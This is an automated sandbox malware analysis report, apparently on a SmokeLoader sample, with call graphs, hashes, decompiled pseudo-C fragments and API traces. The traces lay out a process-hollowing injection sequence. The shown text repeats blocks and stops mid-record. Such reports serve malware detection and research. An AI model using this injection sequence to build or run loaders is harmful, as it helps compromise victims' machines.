                    Start time:14:53:13
                    Start date:03/08/2022
                    Path:C:\Users\user\AppData\Roaming\twtgjvf
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\twtgjvf
                    Imagebase:0x400000
                    File size:186368 bytes
                    MD5 hash:C9948059CDC5E0AEF9C193D605C7F659
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.503883541.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.503917126.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                    Reputation:low

                    Reset < >

                      Execution Graph

                      Execution Coverage:62.6%
                      Dynamic/Decrypted Code Coverage:81.2%
                      Signature Coverage:46.9%
                      Total number of Nodes:32
                      Total number of Limit Nodes:7
                      execution_graph 275 416767 278 41cc30 275->278 277 41676c 277->277 279 41cc62 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 278->279 280 41cc55 278->280 281 41cc59 279->281 280->279 280->281 281->277 241 24c0000 244 24c0630 241->244 243 24c0005 245 24c064c 244->245 247 24c1577 245->247 250 24c05b0 247->250 253 24c05dc 250->253 251 24c061e 252 24c05e2 GetFileAttributesA 252->253 253->251 253->252 255 24c0420 253->255 256 24c04f3 255->256 257 24c04ff CreateWindowExA 256->257 258 24c04fa 256->258 257->258 259 24c0540 PostMessageA 257->259 258->253 260 24c055f 259->260 260->258 262 24c0110 VirtualAlloc GetModuleFileNameA 260->262 263 24c0414 262->263 264 24c017d CreateProcessA 262->264 263->260 264->263 266 24c025f VirtualFree VirtualAlloc GetThreadContext 264->266 266->263 267 24c02a9 ReadProcessMemory 266->267 268 24c02e5 VirtualAllocEx NtWriteVirtualMemory 267->268 269 24c02d5 NtUnmapViewOfSection 267->269 270 24c033b 268->270 269->268 271 24c039d WriteProcessMemory SetThreadContext ResumeThread 270->271 272 24c0350 NtWriteVirtualMemory 270->272 273 24c03fb ExitProcess 271->273 272->270

                      Callgraph

                      • Executed
                      • Not Executed
                      • Opacity -> Relevance
                      • Disassembly available
                      callgraph 0 Function_024C28CC 1 Function_024C0042 2 Function_024C00C3 1->2 3 Function_024C24DD 4 Function_024C3355 5 Function_024C2DD5 6 Function_024C24D1 7 Function_024C24D2 8 Function_024C2452 9 Function_024C1EE8 10 Function_024C2369 11 Function_00416767 56 Function_0041CC30 11->56 12 Function_024C1CE4 13 Function_024C19E6 14 Function_024C3361 15 Function_024C2F7C 16 Function_024C20FD 17 Function_024C2EFE 18 Function_024C187F 19 Function_024C34FA 20 Function_024C2B7B 21 Function_024C2275 22 Function_024C1577 65 Function_024C05B0 22->65 23 Function_024C1977 24 Function_024C1970 25 Function_024C33F1 26 Function_024C3571 27 Function_024C2573 28 Function_024C2D8F 29 Function_024C338A 30 Function_024C1B0B 31 Function_024C198B 32 Function_024C1804 33 Function_024C1E84 34 Function_024C2506 35 Function_024C3487 36 Function_024C0000 66 Function_024C0630 36->66 37 Function_024C1D01 38 Function_024C1B9F 39 Function_024C1D1F 40 Function_024C349F 41 Function_024C1F99 42 Function_024C341B 43 Function_024C1D95 44 Function_024C2D15 45 Function_024C0110 46 Function_024C0010 46->1 47 Function_024C222C 48 Function_024C33A4 49 Function_024C1EA5 50 Function_024C1E26 51 Function_024C1F26 52 Function_024C2EA6 53 Function_024C0420 53->45 54 Function_024C2622 55 Function_024C28A2 57 Function_024C2FBD 58 Function_024C1B3F 59 Function_024C1ABA 60 Function_024C343A 61 Function_024C2D3B 62 Function_024C2F34 63 Function_024C1EB5 64 Function_024C1A37 65->53 66->22 66->46 67 Function_024C34B0 68 Function_024C3133

                      Control-flow Graph

                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 024C0156
                      • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 024C016C
                      • CreateProcessA.KERNELBASE(?,00000000), ref: 024C0255
                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 024C0270
                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 024C0283
                      • GetThreadContext.KERNELBASE(00000000,?), ref: 024C029F
                      • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 024C02C8
                      • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 024C02E3
                      • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 024C0304
                      • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 024C032A
                      • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 024C0399
                      • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 024C03BF
                      • SetThreadContext.KERNELBASE(00000000,?), ref: 024C03E1
                      • ResumeThread.KERNELBASE(00000000), ref: 024C03ED
                      • ExitProcess.KERNEL32(00000000), ref: 024C0412
                      Memory Dump Source
                      • Source File: 00000000.00000002.366445979.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_24c0000_6s1js8BzrC.jbxd
                      Similarity
                      • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                      • String ID:
                      • API String ID: 2875986403-0
                      • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                      • Instruction ID: 68d1b5ef5790b1d9b3f12be2b31341b903c9732c517bf3e701b095e0bc00260b
                      • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                      • Instruction Fuzzy Hash: A8B1B574A00208EFDB44CF98C895F9EBBB5BF88314F248158E909AB395D771AE41CF94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 15 24c0420-24c04f8 17 24c04ff-24c053c CreateWindowExA 15->17 18 24c04fa 15->18 20 24c053e 17->20 21 24c0540-24c0558 PostMessageA 17->21 19 24c05aa-24c05ad 18->19 20->19 22 24c055f-24c0563 21->22 22->19 23 24c0565-24c0579 22->23 23->19 25 24c057b-24c0582 23->25 26 24c05a8 25->26 27 24c0584-24c0588 25->27 26->22 27->26 28 24c058a-24c0591 27->28 28->26 29 24c0593-24c0597 call 24c0110 28->29 31 24c059c-24c05a5 29->31 31->26
                      APIs
                      • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 024C0533
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.366445979.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_24c0000_6s1js8BzrC.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                      • API String ID: 716092398-2341455598
                      • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                      • Instruction ID: 2dec8c50e11455f8be0790d08300b547ec296e0aa21e28045f0775cbd48a2c6d
                      • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                      • Instruction Fuzzy Hash: 8A512974D08388DBEB11CBD8C849BEEBFB26F11708F24405DD5446F286C3BA5659CB66
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 32 24c05b0-24c05d5 33 24c05dc-24c05e0 32->33 34 24c061e-24c0621 33->34 35 24c05e2-24c05f5 GetFileAttributesA 33->35 36 24c05f7-24c05fe 35->36 37 24c0613-24c061c 35->37 36->37 38 24c0600-24c060b call 24c0420 36->38 37->33 40 24c0610 38->40 40->37
                      APIs
                      • GetFileAttributesA.KERNELBASE(apfHQ), ref: 024C05EC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.366445979.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_24c0000_6s1js8BzrC.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID: apfHQ$o
                      • API String ID: 3188754299-2999369273
                      • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                      • Instruction ID: c813cc2ac3b1a4066b4642cccab7d63d2ce0676721c3c496fa0aaa136dc16359
                      • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                      • Instruction Fuzzy Hash: A3011E74D0425CEADB50DF98C5183AEBFB5AF41308F14809DC4092B341D7769B99CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 87 24c0042-24c0054 88 24c0057-24c006a call 24c00c3 87->88 91 24c006c-24c006e 88->91 92 24c0070-24c008d 88->92 91->88 93 24c008f-24c00a2 call 24c00c3 92->93 96 24c00ac-24c00c0 93->96 97 24c00a4-24c00aa 93->97 97->93
                      Memory Dump Source
                      • Source File: 00000000.00000002.366445979.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_24c0000_6s1js8BzrC.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction ID: 9078d4ca35b740730e6e88edf387b0ee98e9fb755472cce85ed9549547e59390
                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction Fuzzy Hash: F0117376340100DFD754DE5AEC90EA673DAFB89330B2A815AE904CB311D675E841CB60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:6.1%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:0%
                      Total number of Nodes:19
                      Total number of Limit Nodes:0
                      execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                      Callgraph

                      • Executed
                      • Not Executed
                      • Opacity -> Relevance
                      • Disassembly available
                      callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                      Control-flow Graph

                      C-Code - Quality: 23%
                      			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				char _v8;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t11;
                      				void* _t16;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t20;
                      				void* _t21;
                      
                      				_t22 = __eflags;
                      				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                      				_t17 = _a4;
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                      				if(_t11 != 0) {
                      					_push(_a16);
                      					_push(_v8);
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, _t20); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				return __eax;
                      			}














                      0x0040180c
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000002.00000002.445274750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_6s1js8BzrC.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                      • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                      • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                      • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000002.00000002.445274750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_6s1js8BzrC.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                      • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                      • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                      • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 17%
                      			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t11;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t22;
                      
                      				_t23 = __eflags;
                      				asm("out 0x95, eax");
                      				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t17 =  *((intOrPtr*)(_t22 + 8));
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                      				if(_t11 != 0) {
                      					_push( *((intOrPtr*)(_t22 + 0x14)));
                      					_push( *((intOrPtr*)(_t22 - 4)));
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, __edi); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}







                      0x00401822
                      0x00401822
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000002.00000002.445274750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_6s1js8BzrC.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                      • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                      • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                      • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 17%
                      			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t8;
                      				void* _t11;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t22;
                      
                      				_t23 = __eflags;
                      				asm("sbb ebx, ebp");
                      				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t17 =  *((intOrPtr*)(_t22 + 8));
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                      				if(_t11 != 0) {
                      					_push( *((intOrPtr*)(_t22 + 0x14)));
                      					_push( *((intOrPtr*)(_t22 - 4)));
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, __edi); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}








                      0x00401826
                      0x00401826
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000002.00000002.445274750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_6s1js8BzrC.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                      • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                      • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                      • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 20%
                      			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t10;
                      				void* _t13;
                      				intOrPtr* _t19;
                      				void* _t22;
                      				void* _t25;
                      
                      				_t26 = __eflags;
                      				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t19 =  *((intOrPtr*)(_t25 + 8));
                      				Sleep(0x1388);
                      				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                      				if(_t13 != 0) {
                      					_push( *((intOrPtr*)(_t25 + 0x14)));
                      					_push( *((intOrPtr*)(_t25 - 4)));
                      					_push(_t13);
                      					_push(_t19); // executed
                      					L00401455(0x60, _t22, __edi); // executed
                      				}
                      				 *_t19(0xffffffff, 0); // executed
                      				_t19 = _t19 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}








                      0x00401834
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000002.00000002.445274750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_6s1js8BzrC.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                      • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                      • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                      • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:6.1%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:0%
                      Total number of Nodes:19
                      Total number of Limit Nodes:0
                      execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                      Callgraph

                      • Executed
                      • Not Executed
                      • Opacity -> Relevance
                      • Disassembly available
                      callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                      Control-flow Graph

                      C-Code - Quality: 23%
                      			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				char _v8;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t11;
                      				void* _t16;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t20;
                      				void* _t21;
                      
                      				_t22 = __eflags;
                      				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                      				_t17 = _a4;
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                      				if(_t11 != 0) {
                      					_push(_a16);
                      					_push(_v8);
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, _t20); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				return __eax;
                      			}














                      0x0040180c
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000007.00000002.503845597.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_400000_twtgjvf.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                      • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                      • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                      • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000007.00000002.503845597.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
